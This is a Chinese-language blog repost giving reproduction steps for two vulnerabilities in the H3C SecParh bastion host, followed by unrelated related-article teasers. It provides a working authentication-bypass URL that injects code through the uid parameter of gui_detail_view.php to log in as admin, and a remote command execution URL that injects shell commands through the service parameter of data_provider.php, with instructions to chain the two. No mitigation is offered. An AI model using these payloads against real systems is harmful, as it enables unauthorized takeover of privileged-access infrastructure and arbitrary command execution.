H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

news2024/12/26 21:00:46

H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

  • 1.H3C SecParh堡垒机任意用户登录漏洞
    • 1.1.漏洞描述
    • 1.2.漏洞影响
    • 1.3.漏洞复现
      • 1.3.1.登录页面
      • 1.3.2.构建URL
    • 1.4.总结
  • 2.H3C SecParh堡垒机远程命令执行漏洞
    • 2.1.漏洞描述
    • 2.2.漏洞影响
    • 2.3.漏洞复现
      • 2.3.1.登录页面
      • 2.3.2.构建URL
    • 2.4.总结

1.H3C SecParh堡垒机任意用户登录漏洞

1.1.漏洞描述

  在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。

1.2.漏洞影响

  H3C SecParh堡垒机

1.3.漏洞复现

1.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

1.3.2.构建URL

URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

在这里插入图片描述

1.4.总结

  这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。

2.H3C SecParh堡垒机远程命令执行漏洞

2.1.漏洞描述

  H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。

2.2.漏洞影响

  H3C SecParh堡垒机

2.3.漏洞复现

2.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

2.3.2.构建URL

URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true

  需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
在这里插入图片描述

2.4.总结

  我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/193424.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

python-pptx 操作PPTx幻灯片文件删除并替换图片

python-pptx 操作PPTx幻灯片文件删除并替换图片 作者:虚坏叔叔 博客:https://xuhss.com 早餐店不会开到晚上,想吃的人早就来了!😄 一、原理 通过查找ppt中的图片指纹替换 二、操作流程 原始ppt如下: 根据…

[单片机] MCU串口发送C方案优化

应用场景: 主频不高非操作系统的单片机,需要在while循环中发送 数据到上位机,当数据较长时,会让发送的过程会让其他操作有卡顿感。为了解决这个问题,需采用一种方法:在每次大循环中只发一个字节数据&#x…

HTML5+CSS3(一)-全面详解(学习总结---从入门到深化)

目录 ​编辑 第一个前端程序 学习效果反馈 前端工具的选择与安装 前端常见开发者工具 浏览器 VSCode中文语言包安装: 学习效果反馈 VSCode开发者工具快捷键 VSCode常用快捷键列表 学习效果反馈 HTML5简介与基础骨架 HTML5的DOCTYPE声明 HTML5基本骨架 html…

Linux(CentOS Stream 9)安装MySQL8.0

mysql8下载链接 链接:https://pan.baidu.com/s/1yBCDbDYUmQWjcM1SdS7Xng 提取码:t37m 上传到服务器上并解压 cd /usr/localtar -xvf mysql-8.0.21-linux-glibc2.12-x86_64.tar.xz解压包重命名为mysql mv mysql-8.0.21-linux-glibc2.12-x86_64 /usr/l…

Linux部署RKNN-toolkit过程以及异常点记录(详细记录)

文章目录Linux部署RKNN-toolkit过程以及异常点记录1.在Linux中安装Miniconda1.1 使用服务器下载Miniconda1.2 安装conda1.3 激活刚安装完成的软件1.4参考博文2.创建并激活Miniconda新环境(rknn)2.1 创建conda环境(命名为rknn)2.2 …

做亚马逊、沃尔玛测评自养号大额、退款一定要解决的几个问题?

大家好我是测评龙哥,今天我跟大家说下做亚马逊、沃尔玛测评自养号、退款、lu货、项目需要用到的防关联、防封号环境的一些底层技术原理。这里讲的内容我相信很少有人能掌握,都是一些比较难的IT术技。 如果你现在准备开始做测评是在了解阶段还是已经在做…

SRM-询报价管理系统搭建指南

1、简介1.1、案例简介本文将介绍,如何搭建SRM-询报价管理。1.2、应用场景企业根据询价需求通知参与报价的供应商,所有供应商会收到通知后进行报价,自动生成了比价数据,企业可参考比价数据对供应商进行选择。2、设置方法2.1、表单搭…

GF_CLR初始用 - 正式版

参照:DeerGF_Wolong框架使用教程 与tackor老哥的踩坑日记所编写,第二次尝试,总结第一次经验重新来。 点击链接加入群聊【Gf_Wolong热更集合】 一. 部署 HybridCLR(Wolong) 环境 首先安装Windows Build Support (IL2CPP)需要完整的克隆项目…

自动驾驶感知——激光雷达物体检测算法

文章目录1. 基于激光雷达的物体检测1.1 物体检测的输入与输出1.2 点云数据库1.3 激光雷达物体检测算法1.3.1 点视图1.3.1.1 PointNet1.3.1.2 PointNet1.3.1.3 Point-RCNN1.3.1.4 3D-SSD1.3.1.5 总结和对比1.3.2 俯视图1.3.2.1 VoxelNet1.3.2.2 SECOND1.3.2.3 PIXOR1.3.2.4 AFDe…

2023年Java学到什么程度可以找工作了?

不管是过去现在还是未来,任何以就业为目的的学习,参考的就业要求最直接的方式就是直接去搜索目标岗位企业的招聘要求。是不是很简单呢!下面是根据Java不同技术层次列举招聘要求:初级Java开发工程师:中级Java开发工程师…

出现这些症状,说明你的免疫力在走下坡路!

这些年免疫力逐渐成为大家关注的重点。随着身边越来越多的人感染,免疫力的强弱影响着每个人身体的恢复情况,好的免疫力就是最有效的药物。免疫力讲究平衡二字,太强、太弱都不好。太强会让机体过于敏感,对非致病因素也发起攻击&…

网络故障监控某小程序延时分析案例

背景 某港口集疏港系统近期出现故障,在凌晨3-5点时段无法上传疫情通勤卡,对港口货物运输带来影响。 该港口已部署NetInside全流量回溯系统,针对本次故障,进行故障定位和原因分析。 分析简介 操作时间:2022年9月8日星…

【C++】C++入门 命名空间 及输入与输出

前言 C是在C的基础之上,容纳进去了面向对象编程思想,并增加了许多有用的库,以及编程范式等。熟悉C语言之后,对C学习有一定的帮助。 C补充C语言语法的不足,以及对C语言设计不合理的地方进行优化,比如&#x…

联想昭阳K4e电脑系统错误导致屏幕闪烁怎么重装系统?

联想昭阳K4e电脑系统错误导致屏幕闪烁怎么重装系统?有用户安装的电脑系统有兼容性错误,导致电脑开机之后,屏幕会不断的进行闪烁,无法正常的进行电脑操作。那么这个情况我们如何去进行电脑系统的重装呢?今天教大家U盘重…

项目管理系统

项目要求 1)服务器负责管理所有员工表单(以数据库形式),其他客户端可通过网络连接服务器来查询员工表单。 2)需要账号密码登陆,其中需要区分管理员账号还是普通用户账号。 3)管理员账号可以查…

【数据结构】极致详解:树与二叉树(下)——链式存储实现

目录 🤩前言🤩: 🤯一、链式存储概述🤯: 🤠二、链式结构的遍历🤠: 1.前序、中序与后序遍历: 2.层序遍历: 🥰三、链式存储结构各接…

2023年转行IT互联网:盘点高薪职业岗位!

要问今年转行求职最想进入的行业,那么互联网肯定算其中一个。智联招聘发布的《2022大学生就业力调研报告》显示,IT/通信/电子/互联网行业是应届生最期望就业的行业。中国青年报中青校媒面向全国大学生发起调查,有64.33%希望毕业后能进入互联网…

linux常识及常用命令

一、介绍 一般项目都是部署在linux服务器上的,linux内核起初是由芬兰人林纳斯托瓦兹在上学时出于爱好编写的。它是一套免费试用和自由传播的类Unix操作系统,是一个基于POSIX(可移植)和UNIX的多用户、多任务、多线程和多CPU的操作…

Task10-Excel看板

文章目录一 分析思路二 实现过程1 确定周数2 销售基础整理3 周销售数据变化趋势4 周销售渠道整理5 看板绘制一 分析思路 二 实现过程 1 确定周数 确定日期所在的周数用:【WEEKNUM函数】 WEEKNUM(serial_num,return_type)参数Ser…

简介CSS

目录 一、CSS概述 二 、CSS的语法规则 三、CSS的引入方式 1、内部样式表 2、行内样式表 四、代码风格 1、紧凑风格 2、展开风格 五、选择器 1、基础选择器 标签选择器 类选择器 id选择器 通配符选择器 2、复合选择器 后代选择器 子选择器 并集选择器…